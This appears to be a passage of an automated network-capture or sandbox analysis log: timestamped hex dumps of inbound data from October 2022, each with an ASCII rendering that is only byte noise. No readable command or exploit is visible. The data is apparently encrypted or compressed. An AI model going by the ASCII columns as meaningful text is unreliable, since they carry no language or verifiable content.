                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1511INData Raw: 91 23 bf 9b 77 43 b9 f9 06 89 5c f2 e3 f6 be ba 87 eb 5b f1 7a 81 35 88 99 92 56 bc 6c 49 ff b1 38 f0 29 fb 7d 9c 6e d6 32 7f 45 ba 06 6a 85 72 90 9d b8 2a a7 f7 c9 e3 f7 ea 30 25 c9 29 00 76 bc 11 aa f7 4b 81 c8 51 7b 8f 4c be 18 0c a9 83 ef 99 30 80 7e d7 8e b1 fe c0 89 ba d0 d7 9a 3c 13 61 2b 1d 29 a1 4a dc 50 31 82 fd a1 e8 40 81 9d 57 d8 d0 ad d4 48 fa 07 6e dd 0e b5 43 14 56 f9 8e 7d 3d 22 df 36 89 57 0d 05 82 ba bb fd 6c 2e 30 65 d8 21 15 d5 81 ab 2c 72 84 26 a9 99 f5 2f 41 c8 bd 14 aa 82 82 40 1e 19 58 d0 d1 21 fe da 28 90 da 11 b5 7a 12 b0 2e 1b 64 32 12 4e fa ee a2 16 04 e8 92 c4 90 10 19 df 90 e6 72 b1 21 c5 05 cf 16 7a e9 8f e3 5a 1b 8a bf 83 51 2c 03 e1 30 f5 f4 9a d2 c6 52 0a 86 40 c5 ee 1f 56 c9 28 d7 47 21 a2 67 fb 98 cd 76 44 52 7b 72 73
                                                                                                                                                                                                                                    Data Ascii: #wC\[z5VlI8)}n2Ejr*0%)vKQ{L0~<a+)JP1@WHnCV}="6Wl.0e!,r&/A@X!(z.d2Nr!zZQ,0R@V(G!gvDR{rs
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1527INData Raw: b4 21 eb 9c 5f d5 2d 25 0d 4b 7a dd 5e 8b 42 5a bd 90 69 e7 72 c2 03 c0 67 b7 c9 db 6d d5 ce 42 37 bb a4 14 2e 0a c6 ba b5 58 23 72 6b be b2 a8 55 04 8d ce f5 e1 b4 0c eb 97 ab f1 fe 97 dd 83 3c 44 81 39 1c 3e a4 04 6c e6 b0 d1 53 ef bd 83 11 35 84 02 22 e2 85 b3 70 19 5d 72 cd 14 71 93 0e 97 40 55 86 cd 18 24 d6 ee d9 28 3f e6 a2 93 45 73 0e 85 36 36 19 93 d3 59 26 5d ae bf 2a 5d b0 94 72 b8 c6 64 c4 35 54 b1 b6 7f 9a 5d ef f3 e8 a8 dc 65 3b 4e 7f 16 c1 55 c3 5e 52 13 e6 1c 3a 50 86 e1 81 66 22 42 f5 7a 62 7b 81 41 5b 93 ad ac a1 fd b5 73 58 1d f3 cb fd 32 6f c3 bc e8 1c 79 24 79 7f 0e dc 72 3b 43 2b f4 dd d4 53 6b 33 41 32 65 ac 3f 84 2c 6a 65 61 82 dc f7 47 9d 8b 19 e3 72 e7 b5 a9 e6 42 ab fc 1b 67 cc 09 45 aa ed 16 d8 5a d6 60 7d d7 73 ee 84 85 f4 2f
                                                                                                                                                                                                                                    Data Ascii: !_-%Kz^BZirgmB7.X#rkU<D9>lS5"p]rq@U$(?Es66Y&]*]rd5T]e;NU^R:Pf"Bzb{A[sX2oy$yr;C+Sk3A2e?,jeaGrBgEZ`}s/
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1543INData Raw: 19 af 5c 2a 46 6e 5b ba a8 88 b8 b8 c2 c7 de 77 9e 70 17 4b a7 2d f9 f7 c1 e4 02 f9 9d 02 1c f0 bd 65 b8 02 cb 01 69 7d 19 35 eb 3f 83 a6 af 78 a2 cb 6c 90 69 cd ff af 32 ab 20 2a 02 ac 00 8b 12 2a 77 7d 0d 2a 05 1d d7 53 83 61 1b 61 4c 69 bb 9a 86 54 9e e3 c0 57 9f 8c fc f1 b5 b4 ec c8 75 92 1f 47 5f 07 c5 84 b9 28 32 a4 ca 72 40 52 55 c7 8f 7a 75 cc 3e 63 b4 53 d2 69 c6 81 2f 64 62 83 67 a1 f4 62 cd c0 fc a8 41 ef 91 68 05 df 0f 36 2a 28 07 b9 c2 a2 6f b0 2c dd f7 fa 01 d9 83 fb 4d 05 57 3b 97 fa de e3 96 84 48 84 ba c8 b0 cf 33 b2 97 f8 58 c8 9d 49 0d dc 2d 09 01 d7 66 85 db e4 61 c9 fd 12 fc 52 6a 0b b1 bc 48 c2 fd 9b 92 c3 8f d4 ce a5 52 07 b0 f5 89 b5 b8 ba f5 74 cf d5 4e fd 52 e8 84 ae a2 bf 09 63 76 53 d2 ca b8 b8 df 1c ad 64 4a 64 02 27 7b 69 df
                                                                                                                                                                                                                                    Data Ascii: \*Fn[wpK-ei}5?xli2 **w}*SaaLiTWuG_(2r@RUzu>cSi/dbgbAh6*(o,MW;H3XI-faRjHRtNRcvSdJd'{i
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1559INData Raw: 7d 60 e7 b9 1a 1f ce 3a 3c c7 b3 0d 78 a5 a3 fe ba f5 4f 46 8f c7 9e 66 c1 a5 62 82 06 f4 9c 28 da 5b 23 84 94 fe 1e 3e 87 3e 13 76 f9 80 b5 a5 3b 17 3e 05 d0 2d 2c 99 cd ad 08 8c 6f f5 af e1 f8 26 42 3b 30 52 19 c5 95 cf 63 30 58 28 92 1f fe 8a c6 b2 82 29 09 e0 7a 4a 22 9a 18 1b 0e 46 a5 96 9d 9d 72 75 18 77 df 75 f0 bb 68 a7 98 8a 0e e5 9e 13 b0 a1 ef ab 92 db 24 9c 9c 63 4e 08 f2 0b 96 7e f0 88 46 12 38 87 28 17 b4 59 ed 8c 26 a4 21 ad 9a ff 06 cb cf f7 5e aa 7c b4 9b 40 43 71 e2 78 c9 99 da 33 4c 7e 65 b9 9a 29 d1 91 aa 1b 27 c8 05 a9 a2 e1 8d 8a a2 15 f6 0c fd c3 8a cc 8b b5 79 28 c9 42 cc 0e 9c 85 91 68 db a3 31 7a 23 ae e8 5a 1d c9 a7 94 75 f0 4b fb 67 eb e9 d6 8a a9 05 b3 28 a5 3f b5 45 53 d3 4a 5d 90 20 23 f3 fc a4 17 e9 e3 75 56 74 4a 50 17 96
                                                                                                                                                                                                                                    Data Ascii: }`:<xOFfb([#>>v;>-,o&B;0Rc0X()zJ"Fruwuh$cN~F8(Y&!^|@Cqx3L~e)'y(Bh1z#ZuKg(?ESJ] #uVtJP
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1575INData Raw: 21 f8 f3 44 b0 c1 5c c8 8b 68 04 af 45 4f d8 01 28 6b 81 0e c6 59 d1 15 67 d0 c7 96 34 46 55 7f 25 b2 87 fc 8d 45 9a 59 09 3d 8d c7 03 2d db b2 f2 dc 2e b2 bf d0 b1 e4 f8 5e 03 16 ff 08 05 43 5e 3c e5 c2 1a f5 ea 5b 5c 69 6d 7c 48 09 2d e9 4e 91 e0 2f b3 f0 98 4b b8 e4 de 5d 85 4c 0d ef 90 4d 8e 60 44 2d fa f3 9e 18 6e d6 09 aa a2 2b 95 8c 39 85 a4 f7 9d 5e db 86 28 c0 41 5e 28 cf fc 42 21 d3 83 5f a9 c8 ce 71 ad d1 d0 d5 21 7e 64 fe ea af 60 db f6 d1 02 84 98 20 25 0a e4 ae 45 5f d3 41 19 83 9f 3d c0 d0 f1 05 09 56 74 85 d0 03 da da 36 db 10 67 c7 36 e0 7e 9a 7a 6d b9 46 87 0b 29 c9 fa bf 6c 82 97 62 42 71 8f f6 df b9 aa e5 ad 88 47 f4 e6 ac 57 45 b9 06 f5 43 96 c6 c5 39 e6 21 ff 2a 78 27 5c d6 21 e5 e9 5c 50 4e d6 ad f9 dd e5 cf c9 41 ca 79 2e e9 72 b8
                                                                                                                                                                                                                                    Data Ascii: !D\hEO(kYg4FU%EY=-.^C^<[\im|H-N/K]LM`D-n+9^(A^(B!_q!~d` %E_A=Vt6g6~zmF)lbBqGWEC9!*x'\!\PNAy.r
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1591INData Raw: 5a e3 c9 04 bf 8a 79 5f c7 8f 32 51 85 5f 4a de 32 67 7d 8f 89 4c cb 55 9a f7 23 bc 51 4b 04 e7 11 90 72 3c be 3a b8 85 8e 2e 38 b1 23 8a 92 d0 4a d0 6f 56 f3 fe 7e 6f 0d d3 97 f4 76 8a f6 bd 25 e2 ca 9d 07 56 dc 2d 9b 30 07 b4 0a 57 d7 1c 66 ed 38 a9 5b 9f 84 53 de e1 3f 6e cb ce 6d ff 4f 56 12 27 92 f5 f1 d9 21 d1 2a a2 8d f5 08 73 4a 67 5e 84 ea ca 9d d6 ff 27 0b 13 9d 6d 02 42 3c 79 ce 91 ba 32 45 63 91 11 fa 6f 4c ba c9 7f 3a 5b 61 40 49 0c da 69 b7 be 7e d5 76 43 b8 c4 42 08 d9 6f a8 02 88 a7 b5 de 1f 8c e4 01 13 b8 e3 e0 34 7a 06 06 c8 77 a8 d4 e6 82 5e 46 1f 2c af 99 4e 46 73 97 6d ed d7 21 69 48 0a 71 79 2d ec 83 3b 48 ee 37 c7 bd cc 3a b7 bc 67 17 45 fe 8c 31 e4 aa 03 ba 12 6f b7 64 35 3e 12 6e 8f b2 0f aa 4b 8c e3 b6 8f 2d b2 45 12 e7 e5 e2 56
                                                                                                                                                                                                                                    Data Ascii: Zy_2Q_J2g}LU#QKr<:.8#JoV~ov%V-0Wf8[S?nmOV'!*sJg^'mB<y2EcoL:[a@Ii~vCBo4zw^F,NFsm!iHqy-;H7:gE1od5>nK-EV
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1607INData Raw: 6d c7 7c 48 18 df 51 35 46 f6 e4 05 b9 69 7d 7f 5f e7 52 dc 11 19 9a a9 81 de ab 05 01 3e 16 21 b9 24 45 64 ac bd 96 3b 6b 04 86 0e ee df 3f 5b d3 56 dc cb b1 ce 8c 50 70 13 92 b1 2c 48 7b 7d 98 c9 d3 5b 9d 7f 3b 4a 0f 8b a4 12 ec b8 74 06 27 c4 4a 12 7d 80 59 6b 0b 6d 24 51 d3 5a 21 79 26 72 fe 0f d6 4b 77 89 3f 3b a9 33 b2 76 81 8f af 51 2a 57 35 11 ed 65 4a af 69 e5 6e f9 49 b5 3c f3 5a 0a 8a 8f 57 20 0a 81 32 39 e0 15 3e 58 e7 cd 64 4d ff 90 a9 d4 4d 90 f7 2a cb a1 5c db f9 b3 9a aa 10 ee de f7 d2 59 06 f2 0c 23 66 a3 0d 84 97 22 f2 0b 29 9a 67 04 49 af e6 c4 61 b3 5b b7 ef 2d 37 a0 26 ff 95 46 3b 4e e8 50 7d 61 07 f5 56 2c da d2 8d 3f 23 a2 7d b7 e8 d5 56 3a c6 2b e9 ba 77 de f2 b7 b2 cd 2f 92 23 8a 75 eb c5 bd f5 e4 ff cf 69 a4 8e 88 c5 0f bd b7 37
                                                                                                                                                                                                                                    Data Ascii: m|HQ5Fi}_R>!$Ed;k?[VPp,H{}[;Jt'J}Ykm$QZ!y&rKw?;3vQ*W5eJinI<ZW 29>XdMM*\Y#f")gIa[-7&F;NP}aV,?#}V:+w/#ui7
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1623INData Raw: 4e b7 ae 3f cb cb 1c 63 37 72 f5 b1 2b 3c 10 6e a7 5b a7 a3 9a 0d 70 79 8e d2 75 cd 82 78 93 94 18 d5 8f cc 34 f4 0b dc f1 fe 38 f1 1a 4d 8b 3b 44 45 d0 90 7e de ed 32 09 45 30 5b c5 e0 4f 13 07 39 4c 10 d9 b2 7f 25 b6 4a d0 51 99 a6 81 cc bd a3 15 ab 7e 77 77 99 20 e6 1e 77 b5 99 91 cd 01 19 24 df 38 9e 01 97 81 94 b3 eb a1 e5 8f eb 0a a4 85 e5 89 c7 9a 72 83 fa 10 4a 27 bb 84 e9 fb 6e 76 02 ae ae b9 4e 2e d5 ba e2 0f 5f 58 9c 7c d5 5e 65 a6 58 d6 72 c7 e1 53 bd 82 33 10 6d ff 59 a7 b4 e6 c0 f3 ff 0c 00 0c c1 bb 7c 80 96 bb 0e a2 d1 ce 7c 54 38 2f a9 94 02 98 a3 bc 91 e0 bf d5 a9 0c 06 bc 4f 2c 24 6b ff 5f 6e 05 ef c0 b4 13 ed d9 b6 55 c3 59 43 88 db c1 fd 20 39 e9 81 50 ec 3a d1 82 9c 75 f9 b8 c6 9e db 67 75 e5 e2 91 db b7 b2 0d b3 62 ca 26 70 8c 65 3b
                                                                                                                                                                                                                                    Data Ascii: N?c7r+<n[pyux48M;DE~2E0[O9L%JQ~ww w$8rJ'nvN._X|^eXrS3mY||T8/O,$k_nUYC 9P:ugub&pe;
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1639INData Raw: 83 65 83 fb 33 6b 91 b0 aa b1 87 fc 0a 0b 83 fb 55 43 0e 4b 5a 4b db f4 94 c6 cf 2b dd f0 9f eb b7 c0 1f 57 d7 9d 21 8a ab 34 2a c0 9b f4 3f fa fb 0a 65 8b 51 c8 5b cb ae 03 93 08 c1 c3 c5 2d c0 58 03 10 2f 5d 94 73 a3 51 aa 9f d1 eb e7 32 fb 59 37 23 41 30 6f 33 58 97 78 c8 1c 9f e9 a3 03 d0 6f cf 33 65 5d 72 ff 9c 53 a9 3e 09 d3 2d b6 c1 d8 8c dd 46 c2 d5 25 31 66 7c ac 30 fc ce 18 b8 da e2 8b 6d 85 10 71 92 d3 0d 75 35 88 1e 55 7a 4c 1c f2 78 15 35 8e 71 4f ab 2a dd 0f 22 55 24 6f 05 89 c7 94 9b 9e a9 1d 1a 17 4d ed a9 14 f6 1c 77 a7 4e 1a 14 74 3f b5 cb 45 18 c0 22 95 aa 2e 06 bf 6e 95 a2 69 21 16 66 d1 63 b3 3f fb a0 a2 ae 50 42 20 32 c7 0f 60 f6 ad 4e 4d b5 06 40 db 39 10 66 ba 58 e9 13 89 6c 8a 0d 43 a1 04 2c 2e 2d 37 bf 88 30 5d fc e9 c9 bf bc be
                                                                                                                                                                                                                                    Data Ascii: e3kUCKZK+W!4*?eQ[-X/]sQ2Y7#A0o3Xxo3e]rS>-F%1f|0mqu5UzLx5qO*"U$oMwNt?E".ni!fc?PB 2`NM@9fXlC,.-70]
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1655INData Raw: 76 71 50 dd 22 0c 5d 65 13 c8 47 28 d5 79 76 65 6a 8d f0 d4 92 02 79 e6 fd c8 15 4b 5f 24 d1 b5 37 0e 2b 1f 81 dc c5 de ad 8d ee 81 6d 21 72 f0 1b c1 b5 93 9c 9a 6d b4 13 cf e1 8b 12 02 26 db 6c 40 b1 3e 63 49 98 17 4e 2b 7b 6c 69 5c 13 56 59 2f ea 3e f5 ff 02 87 b6 19 11 c0 95 71 5d d7 4e 80 5d 86 33 db 91 14 c0 b5 9f 42 9c d4 22 0c a8 46 71 d7 48 89 cb 14 d7 03 36 1e 9d 9a 1d ac 28 18 37 3d b7 63 7e a6 81 0d 18 1f dc 0f 35 c3 4a 2f c0 cf d4 96 15 dd f5 8b cb c7 50 e9 ed 4e 0d ba e0 ab de cb 74 30 55 03 b5 08 01 f2 00 0d 35 a3 6a b9 8d ba 1e d1 56 65 0f 69 68 fc e5 a4 ab 6a 35 d3 43 7a 9d dd fc 8d ac 3b ab 16 93 0d d4 6d da 19 55 43 93 b0 27 59 2e ea f9 85 2b 7a e4 24 65 1d c8 49 10 bc c0 6c 63 89 64 88 62 bf 95 2d ee 4b 38 1a 4c 50 5b 49 85 51 12 a9 ec
                                                                                                                                                                                                                                    Data Ascii: vqP"]eG(yvejyK_$7+m!rm&l@>cIN+{li\VY/>q]N]3B"FqH6(7=c~5J/PNt0U5jVeihj5Cz;mUC'Y.+z$eIlcdb-K8LP[IQ
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1671INData Raw: 04 be ef 59 8b ae 2b 80 f2 8f 39 a9 43 43 eb da 4d 8b c5 87 9a f8 bc 46 91 3b b9 bb a1 70 10 38 46 56 ea 38 85 08 4a 2f 07 39 1e 28 9c a6 6a a4 24 00 b0 98 c2 e1 f5 c8 d9 4c a0 e8 1d ff e9 1e 8d c3 b8 09 6d be 7e da 25 25 ef 4c 71 90 f9 48 6d b6 75 be d2 0b 91 9a 7a da 15 3a 6c 89 5a 14 76 64 61 11 70 44 b4 d7 fb a0 02 89 b8 27 e9 f3 cd 20 7a c3 6f fe 7c 9c ab 28 24 0f de 5a 41 cd 05 8b e3 a3 dc cd 1d 9d bf b6 a0 a4 e2 44 63 e6 e4 b0 d6 52 40 c4 77 e9 fb e6 ca b4 c6 f8 7c 76 21 02 67 5f 58 28 88 40 13 c8 af f0 31 c8 97 62 17 ad af 06 cb 80 b5 b5 12 35 f8 bc ae 69 7b 7a f0 b1 73 42 4d 88 09 75 29 98 42 06 d3 a9 e3 6a 48 43 e7 6f 97 72 d7 4d cc 95 4c fd bc f5 b7 fe 3e ca 0d c9 af 7b 56 6a a3 1c cb ee cb 4f e3 f1 70 e8 79 6a 69 54 79 1e c4 50 2e 60 38 99 90
                                                                                                                                                                                                                                    Data Ascii: Y+9CCMF;p8FV8J/9(j$Lm~%%LqHmuz:lZvdapD' zo|($ZADcR@w|v!g_X(@1b5i{zsBMu)BjHCorML>{VjOpyjiTyP.`8
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1687INData Raw: 6b 96 cf 92 59 0c 9a 7c 75 68 19 e2 64 51 01 a1 9a 6f 0a 9e 24 41 3b 14 0f 3b 02 8f 1a c7 f7 d1 79 20 1b 04 f5 cd d6 19 ee 1f d7 e4 35 3e 7b b2 1f b5 ae 7a 69 ee 69 f3 d0 b0 cb 41 c1 a8 d8 bb 00 4a cb 23 c0 40 f9 fa ed 62 49 c0 a9 74 b5 87 dc 65 7d 00 71 5f 41 91 b6 f0 79 53 5d 93 6c b2 9f 62 67 78 e3 5d d1 6a 41 21 1b 86 6a 0d 32 1e a9 5a 13 aa 79 b5 09 c5 b2 80 61 80 e7 e7 1b ea 5d 6a ac 28 5b 5d d2 0d 0a 04 16 a6 7d 78 03 51 78 8d 24 24 32 1d 2b 63 2f d0 7b 05 fd 9f 5b b6 88 29 a5 0b bb 46 a4 41 6f 54 7e 9d 08 1c 90 e0 77 6a a4 14 10 9f 95 7a af 4f 8b f8 54 cd 13 30 a6 62 20 e1 74 04 9f f7 7c a3 47 ee 66 f0 40 68 2d 65 6a 46 c8 2e 10 2a f1 02 9c b9 c3 b6 2e 8d ba 61 72 7f 91 ed b6 3d 12 47 90 82 68 41 7c 5b 46 27 4f 41 d4 36 27 52 a9 6b 57 f8 36 e9 c7
                                                                                                                                                                                                                                    Data Ascii: kY|uhdQo$A;;y 5>{ziiAJ#@bIte}q_AyS]lbgx]jA!j2Zya]j([]}xQx$$2+c/{[)FAoT~wjzOT0b t|Gf@h-ejF.*.ar=GhA|[F'OA6'RkW6
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1703INData Raw: c1 0d 6f a3 34 7d c9 2c d9 b0 a1 4e ae 2c 27 6f 0c 0e 3a c1 a4 89 3c 59 83 15 78 06 19 3c 5e ce 5f 8b ca 13 9a 62 64 6f 1b ea d3 21 f6 6b 58 39 80 21 8f 83 a7 15 3d 47 6a 6a e5 53 59 7e 5f bd 19 33 42 d1 21 45 fe 1d f1 c5 bc 2d c2 04 1e 56 30 95 a0 6b e7 db ee ac b0 8e 21 ce 90 1e 01 ee 34 bc e7 bf d9 0f d4 e4 69 36 b1 1a 15 e8 09 70 95 1f 65 8d b3 cb bb 0c 8d bb 06 9f e9 45 7a 5d 5f 3b 09 fc 4b cc 53 b7 5b 07 04 8e e7 a0 5c 73 02 7f bc d5 0b 5e dc 93 21 a0 f8 9b fd 93 3d 40 9d fb 5e 6e 6d d9 7b e7 52 f3 60 74 12 f6 00 da 7c ec 71 6f b0 a5 30 4b 56 50 8e 0b a9 aa 1d 61 1b b6 63 a8 95 ac 04 81 ca cf f5 c8 96 4c f8 55 67 11 a5 7a 81 da 52 d6 2a 9e 42 c3 c9 53 a0 1a 36 5f 2e 37 ef 47 a1 4a 84 02 a0 3d 97 e7 4d b3 52 9b a6 84 fe 0a c6 39 00 0c cc bd 04 5f 7e
                                                                                                                                                                                                                                    Data Ascii: o4},N,'o:<Yx<^_bdo!kX9!=GjjSY~_3B!E-V0k!4i6peEz]_;KS[\s^!=@^nm{R`t|qo0KVPacLUgzR*BS6_.7GJ=MR9_~
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1719INData Raw: d0 e9 aa 97 b7 1c fd b3 1f 65 9e 24 55 52 37 43 3e 41 8b 43 4e 87 3d 3e b1 d3 09 cf 29 38 79 28 07 98 e5 66 33 0d 29 04 49 08 8c c8 29 2a 23 7c ba 48 e1 47 c9 ee 8c 31 94 9b a0 2c e4 6c 20 c5 d7 4d eb b3 e7 30 36 12 ca 41 03 7c 54 39 04 c1 1f 6c fd c3 2b cc 18 da 44 0e 0c 6d a2 54 3b 3f ab 9a c9 aa 4b 7a 94 e0 40 4a 2c b4 47 f4 df 79 96 12 a5 7f a2 58 42 fb 02 5e 19 f4 46 0e 8d 10 96 16 f1 10 3c d5 bf 76 86 ff 15 17 78 eb 0e 0b e3 c7 b7 fd c2 84 e3 0e 18 03 30 14 2d c3 b0 6e 53 84 d0 47 43 71 b4 44 95 88 c0 89 08 b4 2b d5 fb 9a 08 a1 46 d0 87 6a 27 c0 b5 80 cc 4d 8e b7 3a fd 25 a9 35 a3 5a 76 13 52 b9 a1 fb 8c 5d de d2 8a 8b d7 6b 4a 76 88 29 73 3d 40 16 2c 6c 77 37 1a 28 68 df 6d 3a 20 13 48 06 8d db 18 23 b8 f8 c5 b9 19 d5 9a a2 07 df be ad 3e c3 46 4a
                                                                                                                                                                                                                                    Data Ascii: e$UR7C>ACN=>)8y(f3)I)*#|HG1,l M06A|T9l+DmT;?Kz@J,GyXB^F<vx0-nSGCqD+Fj'M:%5ZvR]kJv)s=@,lw7(hm: H#>FJ
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1735INData Raw: bb 45 c9 d5 43 ae 13 f0 03 5b a6 d2 31 e9 f6 de 4d e6 ba c1 72 66 68 52 b3 5c ca aa 9a a1 62 23 ad c7 ae 99 a0 20 65 fe 5e b7 9a a3 b5 ba 9f 78 c5 a4 8b b0 86 ff 9f 17 d2 37 98 07 13 79 c2 cc 33 7e 6e 4a 45 a3 7d 28 12 43 d7 04 2e 0a 35 56 89 7a 95 b0 66 78 c2 5c e4 44 20 a0 9b 62 49 eb 55 e8 8e c8 bb 33 3f b2 c7 a1 7d fb 68 3e 94 a0 eb 30 eb dc 5d c0 59 7e 79 24 27 71 35 6b a2 b6 17 a0 66 e6 da e5 9d 96 0f 28 f0 8a e3 53 a8 6a 71 82 0c 95 c7 ff ba 2d 61 1e ca b4 3e c3 73 e7 12 cc 5a 2e 14 23 a2 f0 d6 b0 c8 f2 15 f5 b1 f4 a3 5e 4f fb d5 ce 4f 44 8a d7 3c 7e ad 5c 9f 6d 19 2c 58 4d a1 f1 6c e9 90 45 80 ae 5d db 55 a4 b9 cd bc 46 45 1e 1e 05 c0 70 3b aa d2 4e 67 9e 6c 5a 4a f2 8e 36 b4 f0 e4 32 37 28 93 3a 4c 0d e1 67 d6 15 a3 5c d8 1d f2 6f ec d9 6a 87 c8
                                                                                                                                                                                                                                    Data Ascii: EC[1MrfhR\b# e^x7y3~nJE}(C.5Vzfx\D bIU3?}h>0]Y~y$'q5kf(Sjq-a>sZ.#^OOD<~\m,XMlE]UFEp;NglZJ627(:Lg\oj
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1751INData Raw: 1c a0 9b f2 90 ce ee 24 2f 76 fa c6 9d 0a 24 31 d8 dd 53 ad 64 04 16 9b e8 a7 50 e7 1e af eb 76 3a 2f c7 7b 3e 19 26 97 b9 5a fa 7b 15 51 53 a8 ea e6 a1 3a 7b 84 a1 07 11 7b 23 bc 74 c5 ce c4 10 77 95 9b db 5f 62 89 bb 10 96 aa 68 ff fa 2b 64 1e b1 a5 5b 47 77 12 37 e7 ad 8d af af 80 b7 3e 70 13 fd 60 53 e1 d8 c8 e0 3a 20 62 20 c6 f6 5e f3 cf bc de 1c be 7b 9b 74 2a 75 a9 dc d4 57 24 f7 29 98 e4 58 78 63 a6 4f aa 13 49 ad 5e 82 ec f0 c5 6c 3c 0a 75 72 84 a8 f2 8f c9 0e 93 47 94 c3 1b af 46 5a dd e0 d7 52 96 9a 47 60 a9 8b fb f5 73 22 d6 ca 77 c8 6a 46 ce e3 c6 24 41 d6 47 3f 75 a1 bd d2 52 be 4c f0 df a1 f8 21 10 25 a1 82 af 56 6e 8c 75 de ec f8 a7 3f e9 be 07 c4 57 ec 62 d7 fa 9f 1d 14 4d 26 95 27 eb f7 ce b7 f4 d7 3f f7 b2 08 cc a4 40 02 85 58 0f 64 60
                                                                                                                                                                                                                                    Data Ascii: $/v$1SdPv:/{>&Z{QS:{{#tw_bh+d[Gw7>p`S: b ^{t*uW$)XxcOI^l<urGFZRG`s"wjF$AG?uRL!%Vnu?WbM&'?@Xd`
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1767INData Raw: 89 ef 63 d3 22 19 61 43 36 93 de 1f f3 ef bb 3c d7 32 69 28 13 41 b7 8d cb 05 17 85 64 17 fe dc 2d d1 4e d6 6d 7a e3 53 d0 3c fb c1 ff 8f fa 6a dc 3a 4b e2 a6 c8 06 00 f6 cb 5f 21 22 c8 9f 9c 85 9d c6 05 1a 3f 78 38 f0 35 39 77 6c 5a 5b a4 60 1e 90 b1 dc 85 a9 8b 95 71 a3 d3 be 10 7a 8c b6 73 b1 93 66 71 44 ad 0d bb 3e 6a d5 3a 59 83 ee bc df 2b 39 5b bb 3c 99 60 d7 0e a8 b6 48 14 ef 09 d5 43 92 f1 16 21 1c e2 83 6f d0 0c 62 d8 2b 35 69 bf d9 8d 68 22 9b d6 a2 70 ba 45 c9 f1 b2 ed bf 88 9a c4 b4 d5 04 d4 06 79 f5 0c 43 b8 61 14 ec 18 0c 4b 16 4d 79 ea 82 7b 82 e9 f2 60 8e 8a 0e 63 eb a2 55 1a 6c 09 ed f5 9b 87 a5 93 a0 a3 43 a8 fe a5 ee 07 96 91 5f f6 c7 36 0e e5 7c 9e 68 9b f7 6e e8 f9 c3 84 f0 75 a6 c1 bd 45 40 b7 57 b7 28 34 04 3f 81 9d ec 49 99 7e c4
                                                                                                                                                                                                                                    Data Ascii: c"aC6<2i(Ad-NmzS<j:K_!"?x859wlZ[`qzsfqD>j:Y+9[<`HC!ob+5ih"pEyCaKMy{`cUlC_6|hnuE@W(4?I~
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1783INData Raw: ce 62 68 82 09 35 41 dc a2 07 41 9b 61 56 ce c6 17 f9 a7 69 da 50 e9 00 da 8e f2 39 b0 47 ae e7 21 ea 0b a8 bc 9f 0a ec cb d6 a5 8b 5e 6e 91 9b 37 3c 46 d7 73 f3 67 e5 e8 62 e3 56 80 8c c9 29 82 d9 69 10 06 83 34 00 37 76 0c cf 83 0d 49 26 59 81 37 8a 30 39 df f8 cc f2 2d e6 ee 9f 7d b3 5e 73 fb 22 84 7b 9f 59 11 e5 ca 06 08 b9 30 e9 96 55 85 06 97 b8 9c d5 2c bf 8c 44 be 86 bc e6 fc a3 6e 3f ba 2d 7b 2c cb c1 7a fa 1c 65 53 6e 0c c4 e3 a6 61 6f e5 26 b2 82 0d 80 d3 1d 01 19 9d 42 c5 f1 0f 18 ff f0 ed d2 bb 6e c4 dc 57 b3 2f 3f f9 ee 47 6b cb 7f df 08 e5 4c fa 13 76 08 94 0f 9e e9 3e d4 4a bc ee 83 6f 30 71 59 24 9d 13 3a 69 7c 56 87 30 cf 35 05 5a 1b 35 5d 81 03 10 12 68 a1 08 dc 75 4c d4 b3 b3 9b 6d 78 8e 10 d8 86 6d 89 25 b6 fe 5b 01 3b c2 e6 66 36 86
                                                                                                                                                                                                                                    Data Ascii: bh5AAaViP9G!^n7<FsgbV)i47vI&Y709-}^s"{Y0U,Dn?-{,zeSnao&BnW/?GkLv>Jo0qY$:i|V05Z5]huLmxm%[;f6
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC1799INData Raw: 7e 3d 94 d6 bd fe ef cb 4d b7 ee 36 1c 04 97 9c e5 2f 29 8e 96 4b 60 e0 dc c0 87 db 1b bd 95 85 15 87 c9 86 74 7b 2f f4 03 7a 92 b6 af 60 1d a0 e4 e6 29 54 c5 cb 69 99 ce f9 7f 27 3f e6 c9 32 ca ec 1a 1f 6a 6e 3c 20 a5 09 5f 69 6f 41 7d b7 42 96 e9 e6 4a 9f 92 cc 23 66 11 1b 1a e0 fa e8 9d 6d fe 1e 44 95 93 b1 ed 60 57 03 c8 d9 64 53 6a 34 69 33 f4 f2 03 c6 2b 30 9f 77 7b 9a 3d 35 cb f9 8d 8c b6 36 7d e3 7d 18 39 9b 45 0a dc 48 3d 7b a2 38 04 ff b7 fd 65 e8 db 0c 4b 79 43 f3 71 b3 0c 3d 78 7e 20 be f8 c2 77 e9 9a 24 63 02 5a 00 d9 8f ec 3b 10 f0 60 18 06 dd 62 5f 02 a0 e1 c3 d3 3f 46 5c d1 a4 43 f0 d8 ee 7f 3d 1d 52 e9 d9 88 52 bc 31 99 a4 92 db c9 ed 73 ac 3c d9 3b 61 d4 e2 84 6d 9b 48 64 04 04 91 a5 3c 55 5e cb 37 80 5a f6 75 a1 ef a7 30 4a 61 58 2b e2
                                                                                                                                                                                                                                    Data Ascii: ~=M6/)K`t{/z`)Ti'?2jn< _ioA}BJ#fmD`WdSj4i3+0w{=56}}9EH={8eKyCq=x~ w$cZ;`b_?F\C=RR1s<;amHd<U^7Zu0JaX+
